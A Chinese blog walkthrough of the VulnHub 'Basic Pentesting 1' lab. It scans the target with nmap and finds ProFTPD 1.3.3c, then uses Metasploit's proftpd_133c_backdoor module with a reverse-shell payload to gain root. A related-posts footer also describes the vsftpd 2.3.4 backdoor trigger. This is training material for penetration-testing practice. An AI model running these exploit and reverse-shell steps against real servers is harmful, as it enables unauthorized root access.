FTP服务后门实战

最新推荐文章于 2022-11-03 16:46:52 发布
最新推荐文章于 2022-11-03 16:46:52 发布
阅读量190 收藏
点赞数
分类专栏: 靶场实战系列 文章标签: 安全 web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23347209/article/details/125017319
版权

文章目录

环境准备

靶场下载:https://www.vulnhub.com/entry/basic-pentesting-1,216/
靶机 192.168.146.149
攻击机 parrot 192.168.146.129

一、信息搜集

  • -A 全面扫描
  • -T4设置扫描频率
  • -v输出详细信息
nmap -A -T4 -v 192.168.146.149

在这里插入图片描述
发现开放了21,22和80端口
考虑👆使用ftp的ProFTOD 1.3.3c的漏洞

使用searchsploit搜索漏洞库

searchsploit ProFTOD 1.3.3c

在这里插入图片描述

二、漏洞利用

1.msf里搜索相关漏洞

msfconsole
search ProFTOD 1.3.3c

在这里插入图片描述
使用ftp后门服务命令执行漏洞

2.msf相关模块使用

use exploit/unix/ftp/proftpd_133c_backdoor
show options

在这里插入图片描述
配置payload参数👇

set rhosts 192.168.146.149
set payload cmd/unix/reverse
set rhost 192.168.146.149
set lhost 192.168.146.129
exploit

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

成功上线,并且是root权限
结束

出黎on
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
QT5.0实现FTP服务
06-22
qt5.0实现FTP服务器,源码已验证,可直接下载下来使用。
FTP服务后门利用
qq_39687353的博客
04-11 935
FTP服务后门利用 1.什么是 FTP? 是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息。 FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114) 至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。 2.searchsploit
渗透测试---FTP服务后门
tzyyyyyy的博客
11-03 675
利用FTP服务后门漏洞 通过使用Metasploit框架进行渗透测试 并且取得root最高权限
FTP后门漏洞复现(含有漏洞的vsftpd2.3.4)
顾蒅' Home
09-12 7080
FTP后门漏洞复现 0x01 漏洞简述 vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输
CTF--8.FTP服务后门利用
woo233的博客
09-13 878
FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上,"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
FTP服务后门
qq_44813849的博客
06-08 984
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。 通过扫描靶机IP为:192.168.174.131 攻击机IP为:192.168.174.128 扫描主机服务信息以及服务版本 可以使用searchsploit来查看对应的版本该服务有没有可利用的漏洞 发现了两个利用漏洞,并...
麒麟V10服务器搭建FTP服务
12-14
麒麟V10服务器搭建FTP服务
简单FTP传输服务项目
最新发布
03-05
户端首先连接到FTP服务器的控制端口,然后打开一个随机的非特权端口(通常大于1024),并向服务器发送PORT命令,告知服务器使用这个端口进行数据传输。在被动模式下,FTP客户端向服务器发送PASV命令,要求服务器打开...
Android FTP服务
06-09
通过FTP分享Android设备相关文件,可以通过ftp最设备文件进行新增,删除,修改等操作 通过FTP分享Android设备相关文件,可以通过ftp最设备文件进行新增,删除,修改等操作 通过FTP分享Android设备相关文件,可以通过...
java ftp 服务
02-23
一个简单的demo,适合初学者,java语言使用第三方API,进程FTP上传下载的demo
FTP实战练习
05-23
"FTP实战练习",用于网络上传和下载文件,非常有用,希望对大家有帮助
ftp服务后门利用
Vinson的博客
09-24 657
FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。 searchsploit +版本 查看漏洞信息,找到可利用的溢出代码 需要修改这个文件造成溢出 使用Metasploit进行溢出(用msfconsole打开) 1、输入search对应软件和版本号 2、use exploit 3、查看可以使...
后台运行FTP存取文件实例及命令详解
ITer-Tony
07-07 3359
样例1:上传文件 #>ftp ftp>open 172.18.100.42 ftp>lcd /opt/GenEMS    进入本机目录/opt/GenEMS ftp>mkdir tmp          ftp上创建目录tmp ftp>cd  /tmp           进入远程ftp目录tmp ftp>mput *             上传本机目录/opt/GenEMS的文件到
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11(Scriptkiddie)
Aluxian_的博客
09-21 993
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第十一个靶机了 也是最后一个比较简单1.信息收集 获取ip地址 和端口信息2.metasploit的基本操作3. 了解后门命令执行漏洞这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助!至此这个系列更新完啦!🙂。
CTF FTP服务后门利用
Kstheme的博客
08-19 817
工具: 靶机 kali linux 操作步骤: FTP介绍 FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:“下载”...
ftp服务后门
rlenew的博客
05-28 541
主机:192.168.136.133 靶机:192.168.136.128 用nmap扫靶机 先对21端口入手,用msf查看该版本漏洞 这里利用exploit/unix/ftp/proftpd_133c_backdoor版本后门漏洞渗透,设置参数然后run 直接入侵,查看权限。
4-1CTF夺旗入门教程--FTP服务后门利用
高冷的宅先生
03-28 508
1.信息探测 #开放服务信息 nmap -sV 192.168.2.113 #挖掘全部信息 nmpa -A -v -T4 192.168.2.113 2.查找对应漏洞 #对应FTP版本为ProFTPD 1.3.3c #查找对应漏洞 searchsploit ProFTPD 1.3.3c 3.使用metasploit进行溢出 msfconsole #输入search对应的软件及版本号 >s...
头歌linux网络实战ftp服务器搭建
06-01
好的,我可以回答您关于Linux网络实战FTP服务器搭建的问题。首先,我们需要在Linux系统上安装FTP服务器软件。常用的FTP服务器软件有vsftpd、proftpd、pure-ftpd等。这里以vsftpd为例,介绍FTP服务器的搭建过程。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值